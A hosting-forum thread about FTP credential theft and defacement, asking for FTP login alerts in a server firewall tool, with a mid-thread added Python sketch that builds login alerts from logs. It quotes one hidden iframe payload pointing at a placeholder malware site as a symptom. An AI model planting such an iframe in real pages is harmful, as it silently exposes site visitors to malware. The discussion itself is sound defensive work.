FTP Login Notifications

Xterm
Junior Member
Posts: 1
Joined: 21 Apr 2009, 07:50


Post by Xterm »

Hello!

Thank you for your very good scripts.

Recently, my customers were complaining that their scripts contain the following code:

<iframe src="BADWARESITE" width=1 height=1 style="visibility: hidden"></iframe>

This happens because of malicious software that gets the account password from FTP clients (the most popular: TotalCommander, FlashFXP, FileZilla, etc.).

This is really a very big problem, and I am looking for a solution to it.
For example, the server can send a notification when a user logs in to FTP (the notification must be sent to the main account email), like the SSH login alert in CSF. This would help customers track FTP activity and prevent changes to files.

For example - email to customer:

======
Subject: FTP Login alert - user: userlogin
You can cancel this session using this link.
======

I think this can help customers, and would be grateful if it were added in future versions of CSF.

Any ideas or tips?

Best Regards,
Aleksey.
chirpy
Moderator
Posts: 3537
Joined: 09 Dec 2006, 18:13

Post by chirpy »

I'll think about it. However, I'm not sure about the practicality of informing the FTP account owner, as authentication can be done in a variety of ways and the only method of doing this would be to a unix account in /etc/passwd, which might not even receive email. To that end, the feature would only email the root forwarder (or otherwise designated recipient of the lfd reports). It could also mean a lot of emails being sent, so it would be a feature you'd only want to enable for a very short period of time (e.g. we have several clients who upload webcam images every minute, and that would mean an email to root once a minute for each of those).
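
An added sketch (not part of the thread and not CSF/lfd code) combining the alert proposed in the first post with the volume concern in the reply above: successful logins become one alert per account and source address, repeated at most once per quiet period, so a once-a-minute uploader yields a single mail while a login from a new address is still reported at once. The pure-ftpd-style syslog format, the name `login_alerts` and the sample lines are assumptions.

```python
import re
from datetime import datetime, timedelta

# Assumed format: pure-ftpd-style syslog lines; adjust the regex for other daemons.
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ pure-ftpd: "
    r"\(\?@(?P<ip>[0-9a-fA-F.:]+)\) \[INFO\] (?P<user>\S+) is now logged in$"
)

def login_alerts(lines, year, quiet=timedelta(hours=1)):
    """One alert per (user, ip) pair, repeated at most once per quiet period."""
    last_alert = {}  # (user, ip) -> time of the last alert raised for that pair
    alerts = []
    for line in lines:
        m = LOGIN_RE.match(line.strip())
        if not m:
            continue  # not a successful-login line (logout, upload, ...)
        # syslog timestamps carry no year, so the caller supplies it
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["user"], m["ip"])
        prev = last_alert.get(key)
        if prev is not None and when - prev < quiet:
            continue  # same account from the same address, already reported
        last_alert[key] = when
        alerts.append({
            "subject": f"FTP Login alert - user: {m['user']}",
            "body": f"{m['user']} logged in from {m['ip']} at {when:%Y-%m-%d %H:%M:%S}",
            "user": m["user"],
            "ip": m["ip"],
        })
    return alerts

# Constructed sample log (documentation addresses, hypothetical account name)
SAMPLE_LOG = """\
Apr 21 07:50:01 host pure-ftpd: (?@192.0.2.10) [INFO] webcam is now logged in
Apr 21 07:51:01 host pure-ftpd: (?@192.0.2.10) [INFO] webcam is now logged in
Apr 21 07:51:30 host pure-ftpd: (?@192.0.2.10) [INFO] Logout.
Apr 21 07:52:01 host pure-ftpd: (?@192.0.2.10) [INFO] webcam is now logged in
Apr 21 07:52:40 host pure-ftpd: (?@198.51.100.7) [INFO] webcam is now logged in
Apr 21 08:55:01 host pure-ftpd: (?@192.0.2.10) [INFO] webcam is now logged in
""".splitlines()

if __name__ == "__main__":
    for alert in login_alerts(SAMPLE_LOG, year=2009):
        print(alert["subject"], "|", alert["body"])
```

The alerts are returned rather than mailed, so the recipient (root forwarder or account contact) is left to the caller.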
wdt
Junior Member
Posts: 6
Joined: 20 Mar 2008, 15:22

Post by wdt »

This problem appears because clients don't use an antivirus, and their cPanel/FTP password is stolen by trojans and used later to modify files over FTP (most of the time) or in the cPanel file manager.

The best way to prevent this is to restrict FTP login to some IPs. Unfortunately, this cannot be set globally for a shared-hosting server and should be activated on each user account with a different set of IPs. In this case, the restriction should be at the FTP login level, not at the firewall level (and of course, it should be done by cPanel, for example a new button in the user's cPanel).

Viruses/trojans will evolve and will inject malicious code directly from the client computer/IP, and in this case IP restrictions won't work. Other security methods should be used, e.g. certificate authentication instead of a password, antivirus at the server level. ClamAV only detects a part of these injections. I hope the new Kaspersky for Linux will do a better job, like the one for Windows.